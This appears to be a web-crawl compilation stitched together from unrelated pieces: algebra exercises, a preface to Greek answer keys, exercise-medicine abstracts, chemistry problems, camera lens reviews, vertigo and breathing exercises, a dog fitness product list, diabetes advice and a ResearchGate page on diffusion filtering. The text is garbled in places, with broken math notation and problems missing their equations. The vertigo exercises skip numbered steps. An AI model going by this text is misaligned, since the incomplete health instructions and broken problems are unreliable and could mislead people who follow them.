of symmetry. 1. (f(x)=x^{2}+6 x+9) 2. (f(x)=-2 x^{2}+8 x+4) 2. Exercise (PageIndex{34}) In the following exercises, graph each function using transformations. 1. (f(x)=(x+3)^{2}+2) 2. (f(x)=x^{2}-4 x-1) 2. Figure 9.E.21 Exercise (PageIndex{35}) In the following exercises, solve each inequality algebraically and write any solution in interval notation. 1. (x^{2}-6 x-8 leq 0) 2. (2 x^{2}+x-10>0) 2. (left(-infty,-frac{5}{2} ight) cup(2, infty)) Exercise (PageIndex{36}) Model the situation with a quadratic equation and solve by any method. 1. Find two consecutive even numbers whose product is (360). 2. The length of a diagonal of a rectangle is three more than the width. The length of the rectangle is three times the width. Find the length of the diagonal. (Round to the nearest tenth.) 2. A water balloon is launched upward at the rate of (86) ft/sec. Using the formula (h=-16 t^{2}+86 t) find how long it will take the balloon to reach the maximum height, and then find the maximum height. Round to the nearest tenth. ## 19.E: Review Exercises 2 Answer Keys to H. Hansen and G. Quinn, Greek: An Intensive Course. 2nd revised ed. Fordham UP, 1992. I created these keys while teaching ancient Greek for the first time at Duke University during the 2003&ndash2004 academic year. Since then I have used them as student aids in Summer Greek courses at the University of Arizona. I am posting them here in the hopes that they will prove useful for students encountering Hansen and Quinn for the first time, whether in a classroom or on their own. They are intended to provide guidance to those with questions about the material, but not to help cheaters. If you are a student submitting information you find here as your own work, you are plagiarizing. Plagiarizing is bad! Your instructor will likely not approve. As even the casual user will discover, t he keys have their limitations. For instance, my translations into Greek and English generally represent only one way of interpreting originals, though sometimes I have included alternate versions placed in (parentheses) or underlined. In addition, in most cases more literal English translations have been preferred to those which sound better. As a result, many of the translations of the Readings are awkward (though usually accurate). Finally, it should be noted that though the keys have been corrected a number of times (and more often than not by Petra Axolotl, to whom I owe a great debt of gratitude), errors doubtless remain. So use with caution! And if you find a mistake, please contact me. ## Aquatic exercise for adults with type 2 diabetes: a meta-analysis Aims: The purpose of this systematic review and meta-analysis was to examine the effects of aquatic exercise (AquaEx) on indicators of glycemic control (i.e., glycated hemoglobin [A1c] and fasting plasma glucose) in adults with type 2 diabetes mellitus (T2DM). It was hypothesized that AquaEx would improve glycemic control to a similar extent as land-based exercise (LandEx), but to a greater extent than non-exercise control (Ctrl). Methods: A literature search was completed in February 2017 for studies examining AquaEx training in adults with T2DM. Assessment of glycemic control was necessary for inclusion, while secondary outcomes such as quality of life and cardiometabolic risk factors (i.e., blood pressure, triglycerides and total cholesterol) were considered, but not required for inclusion. Outcomes were measured before and after at least 8 weeks of AquaEx, and data were analyzed using weighted mean differences (WMDs) and fixed effect models, when appropriate. Results: Nine trials including 222 participants were identified. Three trials compared AquaEx to LandEx, two compared AquaEx to Crtl, and four had a pre-/post-design without a comparison group. Results indicate no difference in A1c between LandEx and AquaEx (WMD = -0.02%, 95% confidence interval = [-0.71, 0.66]). Post-intervention A1c was lower in AquaEx when compared to Crtl (WMD = -0.96%, [-1.87, -0.05]). Post-AquaEx A1c was lower compared to baseline (WMD = -0.48%, [-0.66, -0.30]). Conclusions: A1c can be reduced after eight-twelve weeks of AquaEx. However, at this time few studies have examined whether changes in A1c are different from LandEx or Crtl. Keywords: Aquatic exercise Glycated hemoglobin Swimming Type 2 diabetes mellitus. ## Exercises for mechanical neck disorders: A Cochrane review update Background: Neck pain (NP) is disabling and costly. Objectives: To assess the effectiveness of exercise on pain, disability, function, patient satisfaction, quality of life (QoL) and global perceived effect (GPE) in adults with NP. Methods: We searched computerised databases up to May 2014 for randomized controlled trials (RCTs) comparing exercise to a control in adults with NP with/without cervicogenic headache (CGH) or radiculopathy. Two reviewers independently conducted selection, data abstraction and assessed risk of bias. Meta-analyses were performed to establish pooled standardised mean differences (SMDp). The Grade of Recommendation, Assessment, Development and Evaluation (GRADE) was used to summarise the body of evidence. Main results: The following exercises (27 trials) were supported by 'Moderate GRADE' evidence: For chronic NP, 1) cervico-scapulothoracic and upper extremity (UE) strengthening for moderate to large pain reduction immediately post treatment (IP) and at short-term (ST) follow-up 2) scapulothoracic and UE endurance training for a small pain reduction (IP/ST) 3) cervical, shoulder and scapulothoracic strengthening and stretching exercise for a small to large pain reduction in the long-term (LT) (SMDp -0.45 [95%CI: -0.72 to -0.18]) and function improvement 4) cervico-scapulothoracic strengthening/stabilisation exercises for pain and function at intermediate-term (IT) (SMDp -14.90 [95%CI: -22.40 to -7.39]). 5) mindfulness exercises (Qigong) for minor improved function but not GPE (ST). For chronic CGH, cervico-scapulothoracic strengthening and endurance exercises including pressure biofeedback for small/moderate improvement of pain, function and GPE (IP/LT). Authors' conclusions: Specific strengthening exercises of the neck, scapulothoracic and shoulder for chronic NP and chronic CGH are beneficial. Future research should explore optimal dosage. Keywords: Cochrane review Exercise Meta-analysis Neck pain. ## Numerical Problems 1. Liquid nitrogen, which has a boiling point of &minus195.79°C, is used as a coolant and as a preservative for biological tissues. Is the entropy of nitrogen higher or lower at &minus200°C than at &minus190°C? Explain your answer. Liquid nitrogen freezes to a white solid at &minus210.00°C, with an enthalpy of fusion of 0.71 kJ/mol. What is its entropy of fusion? Is freezing biological tissue in liquid nitrogen an example of a reversible process or an irreversible process? 2. Using the second law of thermodynamics, explain why heat flows from a hot body to a cold body but not from a cold body to a hot body. 3. One test of the spontaneity of a reaction is whether the entropy of the universe increases: &DeltaSuniv > 0. Using an entropic argument, show that the following reaction is spontaneous at 25°C: Why does the entropy of the universe increase in this reaction even though gaseous molecules, which have a high entropy, are consumed? Based on this table, can you conclude that entropy is related to the nature of functional groups? Explain your reasoning. The text states that the magnitude of &DeltaSvap tends to be similar for a wide variety of compounds. Based on the values in the table, do you agree? ## Sigma 19mm f/2.8 EX DN Sigma announced that it would be providing lenses for mirrorless cameras, and the 19mm ƒ/2.8 DN ("Digital Neo") is the company's second lens to do so. The lens is offered in the micro four-thirds mount offered by Olympus and Panasonic, and the Sony E-mount for the NEX series of camera. On a micro four-thirds camera body, the lens will offer an equivalent field of view of 38mm on a Sony NEX camera body, the lens offers an equivalent field of view of just over 28mm (both of these figures are in the 35mm film equivalent). The lens ships with a round lens hood, takes 46mm filters, and is available now for around $200. Sharpness The lens provides sharp images, more so on the micro four-thirds camera than on the Sony NEX, owing to the fact that the micro four-thirds sensor does not "see" the corners of the lens. Mounted on the Panasonic GX-1 m4/3 camera, the lens produces excellently sharp images even wide open at ƒ/2.8. There's just a hint of corner softness at ƒ/2.8, but even this is all but eliminated by just stopping down to ƒ/4. Stopping down to ƒ/5.6 technically provides more sharpness, but you'd only notice it looking very closely at a test chart. Diffraction limiting sets in at ƒ/8, but you won't notice any impact on sharpness until ƒ/16, where it is still very sharp across the frame. Fully stopped-down at ƒ/22, there is some impact on sharpness, but it's still very good. Mounted on the Sony NEX-7, the lens follows the same pattern of sharpness - very good at ƒ/2.8, excellent at ƒ/4 to ƒ/8, and softer at ƒ/16 and ƒ/22. In this case however we note softer corners than seen on the GX-1, owing to the larger sensor being viewed by the lens. Chromatic Aberration Chromatic aberration is notable with the lens attached to both camera bodies: on both bodies, it's viewed in the corners, in areas of high contrast. In images shot with the Panasonic GX-1, it appears as magenta-green fringing, and in images shot with the Sony NEX-7, it appears as magenta fringing. It gets marginally better with either camera if you stop down, but only slightly. Shading (''Vignetting'') With the Sigma 19mm ƒ/2.8 mounted on the Panasonic GX-1, corner shading isn't really an issue. However when the lens is mounted on the Sony NEX-7, there is always at least a slight amount of corner shading: at ƒ/2.8, the corners are almost a half-stop darker than the center stopped down, the corners are 1/3 EV darker than the center. Distortion Results for distortion testing with the Sigma 19mm ƒ/2.8 DN are the same with both cameras: there is some notable barrel distortion in the corners of the images (around +0.5%). Autofocus Operation The Sigma 19mm ƒ/2.8 DN uses an in-lens motor for focus and is very fast to do so: focusing from infinity to close-focus took well less than one second. There is no extension of the lens during focus operations and attached filters will not rotate. Macro This is not a lens with any significant macro capability: it only offers 0.14x magnification, with a minimum close-focusing distance of just under 8 inches (20cm). Build Quality and Handling The Sigma 19mm ƒ/2.8 EX DN is a fairly pedestrian lens, small and light with a matte black finish. The lens is made of primarily plastic components, weighing only 140 grams (4.9oz), with plastic 46mm filter threads and a metal lens mount. The lens has only one control on it, the manual focus ring. There is no depth-of-field scale, distance scale or infrared index. The focusing ring is about 3/4'' wide, with deep, easy-to-grip plastic ribs. There are no stops, hard or otherwise, at the close-focusing and infinity end of the lens. The included lens hood is plastic, attaches via a bayonet mount, and can be reversed onto the lens for storage. The interior of the hood is ribbed, and when attached to the lens it adds about 3/4'' to the overall length. Alternatives$250 For the Sony users, the Sigma 19mm ƒ/2.8 offers a slightly longer alternative to the Sony 16mm ƒ/2.8. In this case however the Sigma also offers a sharper alternative, with the 19mm ƒ/2.8 offering significantly sharper results throughout the same apertures. Other test results are also better: CA is better handled, there is slightly less corner shading, and distortion is a bit less severe (naturally barrel-distorted rather than pincushion). $400 At almost double the price of the Sigma 19mm, the Panasonic 20mm offers slightly sharper results with less CA. There is somewhat significant corner shading, but almost zero distortion.$300 Olympus offers a wider alternative to the Sigma, which is about on the same level optically: however, we would give a nod to the Sigma for its better tolerance to chromatic aberration, and slightly sharper performance. In this case, the Olympus makes for a slightly smaller. Conclusion There are a surprising number of alternatives in this category - wide primes for mirrorless cameras - so Sigma's offering comes at an interesting time. It holds its own in our tests, providing a sharp image even wide open at ƒ/2.8, with only slightly notable chromatic aberration in the corners. It's not a case of Sigma finding a niche other manufacturers haven't exploited, however, Sigma does undercut all the current manufacturers with a lower price point. If you haven't got a wide angle prime for your micro four-thirds mirrorless camera, or your Sony NEX camera, then you may want to consider the Sigma 19mm ƒ/2.8 DN. Product Photos Sample Photos The VFA target should give you a good idea of sharpness in the center and corners, as well as some idea of the extent of barrel or pincushion distortion and chromatic aberration, while the Still Life subject may help in judging contrast and color. We shoot both images using the default JPEG settings and manual white balance of our test bodies, so the images should be quite consistent from lens to lens. As appropriate, we shoot these with both full-frame and sub-frame bodies, at a range of focal lengths, and at both maximum aperture and ƒ/8. For the ''VFA'' target (the viewfinder accuracy target from Imaging Resource), we also provide sample crops from the center and upper-left corner of each shot, so you can quickly get a sense of relative sharpness, without having to download and inspect the full-res images. To avoid space limitations with the layout of our review pages, indexes to the test shots launch in separate windows. ## Exercises to Help with Vertigo Repetitive movements can help your brain and body overcome the confusing signals of vertigo. They can also help you manage the sudden onset of dizziness and motion sensations. When you begin these exercises for vertigo, start slowly and understand that initial reactions may make you feel worse. Make sure that you complete these exercises individually, taking breaks between each one. Speak with your doctor before beginning any of these exercises, and let them know if your vertigo symptoms become more serious or if you experience any new symptoms. Brandt-Daroff Exercise This exercise helps to reduce the symptoms of vertigo, and it is most often used for BPPV and labyrinthitis. Step 2: Lie down on your left side and remain still for 30 seconds until dizziness fades. Step 3: Sit up and wait 30 seconds. Step 5: Lie down on your right side, and hold the position for 30 seconds until dizziness fades. Step 6: Sit up and wait 30 seconds. Repeat this process five times, twice a day or as comfort allows. Marching in Place Exercise Marching in place can help you with balance while standing, and it acts as a stepping stone for more advanced movements. Step 1: Stand near a wall or corner, or place a chair nearby. Place your arms by your side. Step 2: Lift your right knee, followed by your left knee as you march. Try to raise your knees as high as comfort allows. Step 3: March in place 20 times. Repeat this exercise two times a day times, and try to extend each set to 30 marching steps. Turning in Place Exercise Turning in place is a more advanced exercise than marching in place. Make sure you have a chair or sturdy walker nearby in case you feel dizzy. Step 2: Slowly turn left in a half-circle, equal to 180 degrees. Step 3: Stop moving and stand motionless for 10 to 15 seconds. Step 4: Slowly turn right in a half-circle. Stand still for 10 to 15 seconds. Repeat this exercise five times. As you complete each round, favor moving in the direction that makes you feel dizzier. Epley Maneuver The Epley maneuver is one of two exercises, called canalith repositioning procedures, designed specifically for BPPV. Follow this exercise maneuver only if you are experiencing BPPV. Step 1: Sit at the end of your bed and turn your head 45 degrees to the right. Step 2: Maintain that position and lie back with head reclining and shoulders resting on a pillow. Hold for 30 seconds. Step 3: Turn your head 90 degrees to the left and wait for 30 seconds. Step 4: Turn your head and body 90 degrees to the left until you are face down on the bed. Hold for 30 seconds. Step 5: Sit up on your left side. These steps apply to the right ear. For left ear issues, reverse all directions: Step 1: Sit at the end of your bed and turn your head 45 degrees to the left. Step 2: Maintain that position and lie back with head reclining and shoulders resting on a pillow. Hold for 30 seconds. Step 3: Turn your head 90 degrees to the right and wait for 30 seconds. Step 4: Turn your head and body 90 degrees to the right until you are face down on the bed. Hold for 30 seconds. Step 5: Sit up on your right side. Repeat this exercise three times or as comfort allows. Semont Liberatory Maneuver The Semont Liberatory maneuver is the second exercise procedure for treating BPPV. Step 1: Sit at the end of your bed and turn your head 45 degrees to the right. Step 2: Lie down on your left side with your head tilted upright, and hold still for 60 seconds. Step 3: In one motion, move from your left side to your right side. Make sure your face is facing the bed. Remain still for 60 seconds. Step 4: Return to a sitting position and sit for 5 minutes. These steps apply to the left ear. For right ear issues, reverse all directions: Step 1: Sit at the end of a bed and turn your head 45 degrees to the left. Step 2: Lie down on your right side with your head tilted upright, and hold still for 60 seconds. Step 3: In one motion, move from your right side to your left side. Make sure your face is facing the bed. Remain still for 60 seconds. Step 4: Return to a sitting position and sit for 5 minutes. Repeat this exercise three times or as comfort allows. ## Pursed-Lips Breathing Pursed-lips breathing is a breathing technique designed to make your breathing more effective by making the breaths slower and more intentional. After inhaling, you pucker your lips and exhale through them slowly and deliberately, often while counting. Pursed-lips breathing has shown to be beneficial for people with anxiety that's associated with lung conditions, such as chronic obstructive pulmonary disease (COPD) and emphysema. It can be performed up to four to five times a day.   1. Relax your neck and shoulders. 2. Inhale slowly through the nostrils for 2 seconds (keep your mouth closed), a deep breath is unnecessary a normal breath will do just fine. 3. Exhale through the mouth for 4 seconds (the extended time is the key). When exhaling, pucker your mouth as if giving a kiss. 4. While breathing out, keep a slow and steady breath don’t breathe out hard. ## Sigma 19mm F2.8 DN A MFT mount review: Modest price, modest performance? With an APS-C image circle, Sigma&rsquos DN series is specifically designed for mirrorless models from Sony and the smaller MFT format adopted by both Panasonic and Olympus. Originally launched as EX types with f2.8 apertures, the firm has refreshed the original two focal lengths (a wide and standard) designating them as their prestigious Art series and added a third, a 60mm short telephoto (reviewed previously). As the wide-angle of the three, this 19mm A series lens is an upgrade of the earlier EX model of the same focal length and, with an MFT mount, is the equivalent to a 38mm f2.8. Although this model features a new cosmetic appearance with a thin metal skin and minimalist exterior, internally this lens features 8 elements (with no less than three aspheres) in 6 groups, like its predecessor. Paradoxically, this 19mm model is larger than the 30mm model and measures 45.7mm in length (as opposed to 40.5mm of the 30mm focal length), focuses down to 20cm and weighs 160g. Although it lacks stabilization, the 19mm f2.8 DN A remains sensitively priced at $199. On the Olympus OM-D E-M1 the Sigma 19mm f2.8 achieves a DxOMark score of 18 points. Although good it&rsquos not great putting it midway between the Lumix G 20mm f1.7 ASPH and Olympus M.Zuiko Digital 17mm f2.8 with DxOMark scores of 22 and 15 points, respectively. However, given those models&rsquo peak sharpness scores of 11P-Mpix and 6P-Mpix, the score of 7P-Mpix for the Sigma is on the low side. While center sharpness is best at full aperture it doesn&rsquot really improve when stopped down and has generally poor uniformity across the field. Not only that but lateral CA is a little higher than we would like with it being just visible in the periphery, sides and corners of the frame. Compared with its predecessor the new model shows some marginal improvement in optical quality, particularly at full-aperture, however the gains are very minor. Transmission and control of chromatic aberration are also very slightly improved, and Sigma has also lowered the distortion, suggesting the firm has fine-tuned some of the optical components. However, in real world terms it would be difficult to tell. While it&rsquos encouraging to see Sigma upgrading the quality of their lenses, much of that on this occasion is cosmetic. However, this model also shows some slight improvement in image quality, mostly at full aperture. Sharpness isn&rsquot everything though and at$199 it remains competitively priced when compared with rival offerings. Exercise is equally important for both you and your dog. Yes, there’s always the standard daily walk, but there’s so much more out there if you’re looking to take your workouts to the next level. We’ve found an at-home agility course, a doggie treadmill, a hands-free bicycle leash and more products that will help you and your dog reach your fitness goals (while still having fun). Check them out below. You can wear this around your waist. Let your pup set the pace for your walks, runs or hikes — or lead the way! Promising review: "If you run, hike or bike with your dog regularly you NEED this leash in your life! It is the absolute best! My 3 y/o 80lb labradoodle is a very active boy and likes to go everywhere we go. It's hard to keep up with his exercise needs with my own two legs, I wanted a leash that would allow me to ride my bike and this is great for that! Being hands-free is amazing." — Kate Mahoney You'll have your dog running back and forth while giving your arm a killer workout. (Biceps? Triceps? All of the above.) Promising review: "One of the best fetch toys out there. Exercises your dog, launches the ball far effortlessly, and can easily spot the orange ball. My 8-year-old boxer who is an obsessive-compulsive fetcher absolutely loves this." — Rintje Use this to make your daily dog walks more exciting for you and your pup. Promising review: "These are wonderful for exercising your pup. My dog (10 months) goes and gets it and begs me to play with him. It's fun and he gets lots of exercise running and jumping." — Juliet Hart So your dog can join the fun of your neighborhood bike rides. It's suitable for all bike models and will keep your doggo safe with a stainless steel guide pole. Promising review: "This product is helping me get back in shape! This bike leash has significantly reduced my dog's ability to knock me off my balance, which was a daily occurrence before. I highly recommend this leash." — DJ G. Promising review: "My dog loves to play ball especially with this because he can easily grab it and run. He loves when you chase him around and try to take his ball. Very well made." — Zoe This will give your dog a full-body workout. You can get involved too — grab the other end for a game of tug of war! Promising review: "My 8-month-old American bully loves this! Great installation instructions and extremely easy to set up! He’ll be able to get a lot of exercise from this!" — Lesa Danielson Get you and your pups running in the yard, at the beach and everywhere in between. Promising review: "We love this disc and a pack of five is perfect for endless throwing abilities! We have a high energy weim-lab mix who is obsessed with playing frisbee. Good durability, wonderful visibility, and harm-free catching equals tons of fun for our dog and us!" — Chelsie Perfect for the tiny pups who want to join in on your adventures! Use this hiking, skiing, biking, walking or even dancing. The possibilities are endless! Promising review: "Best decision I have ever made for my dogs, seriously life-changing! Thanks to this pack, me and my dogs all get more exercise. I tell people daily when I'm out walking the trails how much I love it!" — Jamie Thomsen You'll be able to get your steps in early in the morning or at night when you have this. Promising review: "I have two large dogs who need lots of exercise, and we often walk late at night or early morning. I bought one of these harnesses three years ago just to check it out. Loved it so much I immediately bought another. Whenever we walk in the dark, they are each wearing one. We've done this for three years constantly." — Watery M These will level up your fetch game. These balls float and are light enough to throw long distances. Promising review: "We have a lumbering Great Dane/Boxer and an energizer bunny Jack Russell/Border Collie. They both adore this ball! These are great for fetching, they float in water, they have a good bounce to them, and they hold up to a lot of intense chewing. If you have a mouthy dog, a chewer, or a fetch fanatic, this is your toy. Get several — you won't regret it!" — Amanda You and your pup can become canoeing and kayaking voyagers with this. Promising review: "I needed to get my dog in the local lake for some swimming exercise. This is easy to get on and off of him, adjust to size, keep him afloat, and priced within my budget. It gives you peace of mind when you are in or around the water with your best canine friend." — nanjking Promising review: "I love how compact the DogPacer is! With the side panels removed, you hardly notice it. It's relatively quiet and the track is plenty long enough for 50–65-lb dogs. Controls are simple and quick. Well worth the price!" — M.K. With this, both you and your dog can get active outside. Build each other's agility by playing hide-and-seek, chase, fetch and more! Promising review: "This is an awesome beginner agility set. You can set it up easily for the height you need and it is easy to put into the grass. I love that everything comes packed into two bags you can easily carry on your shoulder. They are light. Great set! Colorful and looks sturdy! Plus, you get to be physically active and have fun with your dogs, while they get physical and mental exercise, which they need!" — John L. Schieffer III If you have a senior dog, you need this. The subtle wobble motion of these cushions helps to activate stabilizing muscles — great for rehabilitation or physical therapy! Promising review: "The pet balance disc worked so well we ended up buying a second one! We really love it and so does our dog." — Jason M. Your dog shouldn't be left out of the FitBit club. This collar tracks your dog's location and activity levels and also notifies you when they leave home and reach their goals. Promising review: "Overall, l give this product the five stars. l was mostly interested in this as a tracker for a wayward pupper, but it does much more than this as it also tracks her fitness and general health. I would definitely purchase this item again." — Bruce E. Mitchell This is lightweight, safe on your pets' teeth and perfect to take outside to get more active together. Promising review: "Best toy ever! My dog LOVES this thing! It’s lightweight so he can toss it, run with it and it’s so durable we can even tug with it. Will be buying a few more just in case he loses it." — Amazon Customer Protect your pup's feet on trickier climbing trails, walks and terrain of any kind. Plus, it's made of all-natural food-grade waxes and oils! Promising review: "As the owner of a 60+ pound Catahoula who demands daily exercise the fact it's snowing or people who put rock salt down cannot deter me or him from our daily hour-long walks. So, the next best solution was that Musher's Wax. It's perfect. I cannot rate this product highly enough." — Shannon Lew Fill this (with this weight even distributed on both sides), so your dog can feel involved with your backpacking, trekking or camping trip. Promising review: "Great pack for my dog, I bought the large for my 90+ pound German shepherd. Mainly bought it for exercise, add weight to the pockets on walks and during play time. I like to take him on hikes with me, plenty of room for food, bags, water, treats etc. Overall great product, high quality material and stitching." — David Rubio Give your dog the freedom to roam and wander without fear that they'll run away. You'll love using this on your walks to the dog park, camping or beach trips, hiking and even training! Promising review: "My dog loves this leash! This leash will allow her to get way more exercise than our 30 minute walks do. We are also in the process of training her emergency recall and I’ll be using this leash for that as well. I haven’t had it long but I feel like it’s a good investment." —NavyChiefWife With this, you and your pup can walk, run or bike longer without them getting dehydrated. Promising review: "This water bottle has SAVED us on walks with our 4-month-old pup outside. She enjoys drinking out of this more than her own water bowl. SO convenient to carry around, leakproof and easy to clean! Highly recommend this product for all other pet humans." — Amanda Wang ## How to exercise safely with diabetes Exercise is recommended for all people with diabetes, though some may have to take extra precautions. For example, people with type 1 diabetes should be particularly careful. "For type 1 diabetics, exercise can lower blood sugar more dramatically," Hsu says. Dangerously low blood sugar, or hypoglycemia, can cause health complications including seizures and coma in severe cases. People with type 1 diabetes should carefully plan their exercises around food intake and insulin dosage, according to the ADA. It's also important to measure your blood sugar levels before, during, and after exercise — or check your blood sugar with a continuous glucose monitor. Overall, it's best to work with your doctor to develop a routine if you have type 1 diabetes. If you have diabetes and are starting an exercise routine, you should take the following steps: • Speak with your doctor. Let them know if you've had any other health complications with diabetes, like eye problems, heart disease, or stroke. • Start slow. Familiarize yourself with how exercise affects your blood sugar by measuring your blood sugar before and after exercise, and monitoring any major changes. Your blood sugar should stay within the healthy range that you and your doctor have established. • Monitor your feet for ulcers or sores. Many diabetics have decreased sensation in their feet, Li says, so you might not notice pain from sores. Visual monitoring can help you spot them and prevent infection.
2021-11-30 22:01:06
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2353050857782364, "perplexity": 5882.287995818194}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964359073.63/warc/CC-MAIN-20211130201935-20211130231935-00182.warc.gz"}
https://www.researchgate.net/publication/2644974_Relations_Between_Regularization_and_Diffusion_Filtering
Article # Relations Between Regularization and Diffusion Filtering Authors: To read the full-text of this research, you can request a copy directly from the authors. ## Abstract Regularization may be regarded as diffusion filtering with an implicit time discretization where one single step is used. Thus, iterated regularization with small regularization parameters approximates a diffusion process. The goal of this paper is to analyse relations between noniterated and iterated regularization and diffusion filtering in image processing. In the linear setting, we show that with iterated Tikhonov regularization noise can be better handled than with noniterated. In the nonlinear framework, two filtering strategies are considered: total variation regularization and the diffusion filter of Perona and Malik. It is established that the Perona-Malik equation decreases the total variation during its evolution. While noniterated and iterated total variation regularization is well-posed, one cannot expect to find a minimizing sequence which converges to a minimizer of the corresponding energy functional for the Perona-Malik filter. To address this shortcoming, a novel regu... ## No full-text available ... These properties include well-posedness results, preservation of the average grey value, maximum-minimum principles, Lyapunov functionals, and convergence to a constant steady state. It was possible to regard also regularization methods as scale-spaces by interpreting their Euler-Lagrange equations as fully implicit discretizations of a parabolic partial differential equation with a single time step [6]. Radmoser et al. [7] have extended these results to nonstationary iterative regularization methods, where the regularization parameter can vary from iteration to iteration. ... ... Note that (1.5) immediately implies 6) and the relation (1.6) shows in which way the density introduced in (1.3) approximates the TV-case from (1.1). ... ... As outlined in [6] or [7], we can introduce Lyapunov functionals for the nonstationary regularization methods considered here leading to an appropriate version of Theorem 4.1 (a) in [7] with some adjustments resulting from the linear growth of F stated in (A3). In what follows, r : [0, 1] → R is a function such that r ∈ C 2 ([0, 1]) and r 0. With u(t) from Theorem 1.1 we define the Lyapunov functional ... Article Full-text available The TV-regularization method due to Rudin, Osher, and Fatemi is widely used in mathematical image analysis. We consider a nonstationary and iterative variant of this approach and provide a mathematical theory that extends the results of Radmoser et al. to the BV setting. While existence and uniqueness, a maximum–minimum principle, and preservation of the average grey value are not hard to prove, we also establish the convergence to a constant steady state and consider a large family of Lyapunov functionals. These properties allow us to interpret the iterated TV-regularization as a time-discrete scale-space representation of the original image. ... The minimization problem (2) was studied for different functions p, see [23] or [24]. One of the motivation of the representation (2) is the interpretation of the regularization term with diffusion equations. ... ... Total-Variation has the advantage to provide satisfactory image restoration without a priori information about the target image. On the other hand, the Perona-Malik model [16] has shown impressive results on edge preservation with a suited contrast parameter λ and has been extended to inverse problems with applications in image restoration, see [23]. A disadvantage of the Perona-Malik model is to be sensitive to the sole parameter λ when the complexity of an image makes intervene many different levels of contrast. ... ... While the latter two were based on partial differential equations, the former were very problem specific. Another combination of these methods can be found in [23], where the authors analyzed regularizations and diffusion processes for image denoising, that is the special case A being the identity operator. In [7], the authors gave conditions on the penalty term to perserve edges and considering a single optimization problem. ... Preprint Building on the well-known total-variation (TV), this paper develops a general regularization technique based on nonlinear isotropic diffusion (NID) for inverse problems with piecewise smooth solutions. The novelty of our approach is to be adaptive (we speak of A-NID) i.e. the regularization varies during the iterates in order to incorporate prior information on the edges, deal with the evolution of the reconstruction and circumvent the limitations due to the non-convexity of the proposed functionals. After a detailed analysis of the convergence and well-posedness of the method, this latter is validated by simulations perfomed on computerized tomography (CT). ... On the other hand, anisotropic diffusion is inherent to Perona-Malik (PM) filtering [28]. It is well-known that the diffusion process governed by the PM equation leads to a decrease in the total variation during its evolution [34]. We, thus, choose the energy functional of the Perona-Malik equation for anisotropic diffusion [28]. ... ... We refer to [6,34] for a general introduction to anisotropic diffusion and a detailed discussion on the PM functional. Further, in [31], the PM model was used in the reconstruction of log-conductivities in AET and it was observed that the reconstructions obtained demonstrated superior contrast and resolution. ... Preprint A new non-linear optimization approach is proposed for the sparse reconstruction of log-conductivities in current density impedance imaging. This framework comprises of minimizing an objective functional involving a least squares fit of the interior electric field data corresponding to two boundary voltage measurements, where the conductivity and the electric potential are related through an elliptic PDE arising in electrical impedance tomography. Further, the objective functional consists of a $L^1$ regularization term that promotes sparsity patterns in the conductivity and a Perona-Malik anisotropic diffusion term that enhances the edges to facilitate high contrast and resolution. This framework is motivated by a similar recent approach to solve an inverse problem in acousto-electric tomography. Several numerical experiments and comparison with an existing method demonstrate the effectiveness of the proposed method for superior image reconstructions of a wide-variety of log-conductivity patterns. ... We exploit and extend connections between variational models and diffusion processes [65], and their relations to residual networks [2,63]. In contrast with our previous works [2,4] which focussed on the one-dimensional setting and corresponding numerical algorithms, we now concentrate on two-dimensional diffusion models that incorporate different strategies to achieve rotation invariance. ... ... with an increasing regulariser function Ψ which can be connected to the diffusivity g by g = Ψ [65]. Comparing the functional 8 to the one in (4), we have now specified the form of the regulariser to be R(u) = Ψ tr ∇u∇u . ... Article Full-text available Partial differential equation models and their associated variational energy formulations are often rotationally invariant by design. This ensures that a rotation of the input results in a corresponding rotation of the output, which is desirable in applications such as image analysis. Convolutional neural networks (CNNs) do not share this property, and existing remedies are often complex. The goal of our paper is to investigate how diffusion and variational models achieve rotation invariance and transfer these ideas to neural networks. As a core novelty, we propose activation functions which couple network channels by combining information from several oriented filters. This guarantees rotation invariance within the basic building blocks of the networks while still allowing for directional filtering. The resulting neural architectures are inherently rotationally invariant. With only a few small filters, they can achieve the same invariance as existing techniques which require a fine-grained sampling of orientations. Our findings help to translate diffusion and variational models into mathematically well-founded network architectures and provide novel concepts for model-based CNN design. ... More recently, linear scale-spaces based on pseudodifferential operators have attracted attention, such as the Poisson scale-space [20], α-scale-spaces [19], summed α-scale-spaces [14], and relativistic scale-spaces [11]. Also regularisation methods and related concepts can be interpreted as scale-spaces by considering their Euler-Lagrange equations, both in the linear and the nonlinear setting [10,13,44,50,53]. Since Gaussian scale-space can be described by a linear diffusion equation, it is natural to generalise it also to nonlinear diffusion scale-spaces [49,60]. ... ... So far, our framework requires evolutions that adhere to a semi-group property. This excludes its application to scale-spaces that do not satisfy this requirement, e.g., regularisation scale-spaces [13,44,50,53] and the closely related Bessel scale-space [10]. We will investigate if our concepts can be extended to handle also these processes. ... Article Full-text available It is well-known that there are striking analogies between linear shift-invariant systems and morphological systems for image analysis. So far, however, the relations between both system theories are mainly understood on a pure convolution / erosion level. A formal connection on the level of differential or pseudodifferential equations and their induced scale-spaces is still missing. The goal of our paper is to close this gap. We present a simple and fairly general dictionary that allows to translate any linear shift-invariant evolution equation into its morphological counterpart and vice versa. It is based on a scale-space representation by means of the symbol of its (pseudo)differential operator. Introducing a novel transformation, the Cramér–Fourier transform, puts us in a position to relate the symbol to the structuring function of a morphological scale-space of Hamilton–Jacobi type. As an application of our general theory, we derive the morphological counterparts of many linear shift-invariant scale-spaces, such as the Poisson scale-space, $$\alpha$$-scale-spaces, summed $$\alpha$$-scale-spaces, relativistic scale-spaces, and their anisotropic variants. Our findings are illustrated by experiments. ... We exploit and extend connections between variational models and diffusion processes [65], and their relations to residual networks [2,63]. In contrast to our previous works [2,4] which focussed on the one-dimensional setting and corresponding 